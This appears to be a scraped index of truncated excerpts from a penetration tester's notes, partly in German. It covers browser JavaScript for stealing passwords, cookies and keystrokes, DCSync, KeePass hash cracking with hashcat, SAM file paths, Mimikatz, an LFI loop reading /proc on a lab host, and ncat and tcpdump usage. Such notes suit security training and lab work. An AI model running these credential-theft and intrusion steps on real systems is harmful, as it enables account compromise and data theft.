-
Get hidden content from password fields Scenario: Use JavaScript for extraction. Copy and pase the following into the web browser’s console: Extract keystrokes live from a Browser Scenario: Do: Extract Cookies Scenario: Inject/Do: Extract local / session storage Like above: Stealing site passwords Scenario: Then, inject JS which adds an invisible user/username/name text field and…
-
Attacking Domain Controller Synchronization The DRS Directory Replication Service is responsible to replicate a DC’s data to multiple redundant DC’s. Scenario: You own a user who has one of the following rights: Normally, users in the following groups have these (could be configured otherwise, of course): You can check with the script in Basic Active Directory…
-
The hash of a master password of a Keepass kdbx file can be extracted with keepass2john Database.kdbx > keepass.hash Then, crack it: /opt/hashcat/hashcat keepass.hash /opt/password_lists/rockyou.txt -m 13400 -r /opt/hashcat/rules/rockyou-30000.rule (!) If there is an error regarding salt, check if you have the username like “user:” at the beginning of the file. Remove it.
-
Execution If you cannot execute an exe file, try these options: Windows firewall / netsh Check firewall state netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example how to add exceptions into the firewall via the command line from an administrator: C:\Windows\temp> netsh advfirewall firewall…
-
Grab the SAM and system file: %windir%\repair\sam %windir%\System32\config\RegBack\SAM %windir%\system32\config\SAM %windir%\repair\system %windir%\System32\config\RegBack\system %windir%\system32\config\system (Re-) Run the credential retrievers from the script page.
-
This site contains links to tools / techniques which can run in the background during an engagement. Linux Windows
-
For reverse engineering Devicename Content /proc/$pid/maps Shows the mempory mapping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via a LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done The, look in the /tmp/proc directory for files > 0 byte. Read environment of…
-
The DPAPI is a Windows system which stored passwords bound to the local system. In the user directory there are the keys stored in the AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s password, a master key is derived. When the user changes his password, a new master key is generated as well — and all old master…
-
Windows creates and stores credentials in the Local Security Authority Subsystem Service LSASS in the memory. On the filesystem, the sam database stores the hashes. Use Mimikatz Usage Enable debug mode. This usess the SeDebugPrivilege so that we are able to communicate with other processes. privilege:debug Try to elevate privileges to obtain SYSTEM user privileges:…
-
BloodHound analyzes and present Active Directory Data. SharpHound is the data collector which runs on a compromised AD system. On the target: On the own system:
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
-
General After beeing root, do the following to gain additional information. Copy / break /etc/shadow or SAM Investigate all /home directories and /root ls -lahR /home/ Are there SSH keys? Investigate all databases and get / break their users and passwords Check cronjobs/-tabs Enumerate programs and determine where credentials could be. Enumerate the user’s mail Enumerate WWW directories…
-
tcpdump Get incoming ICMP packets: sudo tcpdump -i any icmp and src host $target Nützliche Parameter Domains nicht auflösen, IPs anzeigen -n Dump der Daten anzeigen -X Paket in ASCII anzeigen -A Umgang mit Dateien Dump in Datei schreiben tcpdump -w file Dump aus Datei lesen tcpdump -r file Standard-Abfragen tcpdump -n src|dst 10.10.10.10 and port…
-
See a packet in its context Kontextmenü, Follow auswählen Show only ICMP packets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside the own address ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wireshark can transform captured audio…
-
Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…
-
Like OSXcollector, but for Windows. Collects information on a host for later analyzation. https://www.fireeye.com/services/freeware/redline.html
-
osxcollector http://yelp.github.io/osxcollector/ Stand alone python script. Execute it on a Mac which should be analysed. It creates an archive with “everything” interessting which the victim can hand over an expert. See redline for Windows